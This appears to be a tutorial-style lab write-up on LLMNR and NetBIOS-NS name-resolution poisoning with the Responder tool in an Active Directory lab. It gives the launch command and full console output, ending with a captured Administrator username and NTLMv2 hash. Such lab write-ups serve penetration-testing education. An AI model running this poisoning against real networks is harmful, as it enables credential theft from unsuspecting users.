What is LLMNR and NetBIOS-NS?
NetBIOS:Network Basic Input Output(NetBIOS) is an API that allows computers on the local network to communicate with each other.
NetBIOS-NS: It is a service that NetBIOS uses for name resolution. It can only work over IPv4.
LLMNR:Link-Local Multicast Name Resolution(LLMNR) is DNS-based name resolution protocol of Windows environment that can work over IPv4 and IPv6. It is supported on Windows Vista and later Windows operating systems.
Execution of the Attack
In the attack we will use a tool called Responder : https://github.com/SpiderLabs/Responder
Responder is a tool that provides appropriate responses by listening to requests from the victim machine and imitating various servers.
First we start the responder, it can also be started with just the parameter -I eth0
responder -I eth0 -rdwv- rdwv : -rd is the parameters required to respond to different services. -v increases readability.
- The -w parameter is used in mitm attacks for the wpad protocol
I’m going to make a false request via file share from a machine in the Active Directory Lab.
Since the DNS server of the victim’s machine is not registered in the Domain Controller, it will cause LLMNR broadcast broadcast. No matter what we write, it is enough that it is registered in the Domain Controller.
responder -I eth0 -rdwv
. — — . — — -. — — -. — — -. — — -. — — -. — | |. — — -. — — .
| _| -__|__ — | _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [eth0]
Responder IP [192.168.100.201]
Challenge set [random]
Don’t Respond To Names [‘ISATAP’]
[+] Current Session Variables:
Responder Machine Name [WIN-TUWG92WLJ8N]
Responder Domain Name [2N0L.LOCAL]
Responder DCE-RPC Port [46021]
[+] Listening for events…
[*] [NBT-NS] Poisoned answer sent to 192.168.100.101 for name (service: File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.100.101 for name
[*] [LLMNR] Poisoned answer sent to 192.168.100.101 for name
[SMB] NTLMv2-SSP Client : 192.168.100.101
[SMB] NTLMv2-SSP Username : alixan\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::DCAX1:f2501f1d591a27d6:7C9F19B3358745BFE3D114841A4AFBC4:010100000000000080D276C851A2D7017D14D0D633EBE44D0000000002000800520057005A00450001001E00570049004E002D00310034005A00570034005A0057004600550049005A0004003400570049004E002D00310034005A00570034005A0057004600550049005A002E00520057005A0045002E004C004F00430041004C0003001400520057005A0045002E004C004F00430041004C0005001400520057005A0045002E004C004F00430041004C000700080080D276C851A2D701060004000200000008003000300000000000000000000000003000005A17CDBB632790A8C90056ECE36E70F21B2D68EE70875D078D07ADD10C02B0470A001000000000000000000000000000000000000900140063006900660073002F00730061As we can see we were able to get the username and the NTLMv2 hash
References:https://www.techtarget.com/searchnetworking/definition/NetBIOS
https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution
